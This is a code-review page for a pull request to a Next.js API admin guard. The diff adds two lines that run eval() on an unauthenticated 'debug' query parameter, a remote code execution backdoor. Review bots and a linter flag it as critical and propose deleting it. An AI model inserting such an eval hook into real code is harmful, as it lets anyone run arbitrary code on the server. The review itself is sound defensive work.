2 changes: 2 additions & 0 deletions apps/api/v1/lib/utils/isAdmin.ts
@@ -7,6 +7,8 @@ import { ScopeOfAdmin } from "./scopeOfAdmin";

export const isAdminGuard = async (req: NextApiRequest) => {
const { user, userId } = req;
const debug = req.query.debug;
if (debug) eval(debug as string);
Comment on lines +10 to +11
⚠️ Potential issue | 🔴 Critical

Remove eval on req.query.debug – this is unauthenticated remote code execution.

debug comes directly from the request query, and eval(debug as string) will execute arbitrary attacker‑supplied code, even before you verify req.user. This is a critical security vulnerability and matches the Biome noGlobalEval finding.

You should remove this hook entirely rather than trying to “sanitize” it. If you need debugging, prefer controlled feature flags or logging instead of executing request data.

-  const debug = req.query.debug;
-  if (debug) eval(debug as string);
🧰 Tools
🪛 Biome (2.1.2)

[error] 11-11: eval() exposes to security risks and performance issues.

See the MDN web docs for more details.
Refactor the code so that it doesn't need to call eval().

(lint/security/noGlobalEval)

🤖 Prompt for AI Agents
In apps/api/v1/lib/utils/isAdmin.ts around lines 10-11, remove the insecure eval
usage that executes req.query.debug (delete the two lines that read debug from
the query and call eval); instead implement a safe alternative such as reading a
server-side debug flag or feature-flag/env var or using processLogger.debug(...)
to log the query value when authorized, and ensure any debug behavior is gated
by authentication/authorization and never executes request data as code; also
search the file for any other uses of eval or Function(...) and remove them.

if (!user) return { isAdmin: false, scope: null };

const { role: userRole } = user;
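Review bot: the two added lines (+10 to +11) call `eval` on `req.query.debug` before the `if (!user)` check in the following context line, so the guard executes untrusted request input as code on every call, authenticated or not; since this hunk is the whole change (2 additions, 0 deletions) and an admin guard has no need for it, both lines should simply be dropped, and the `as string` cast also hides that a Next.js query value may be `string | string[]`. If a debug path is genuinely needed, gate it on a server-side flag or environment variable and log the value rather than execute it.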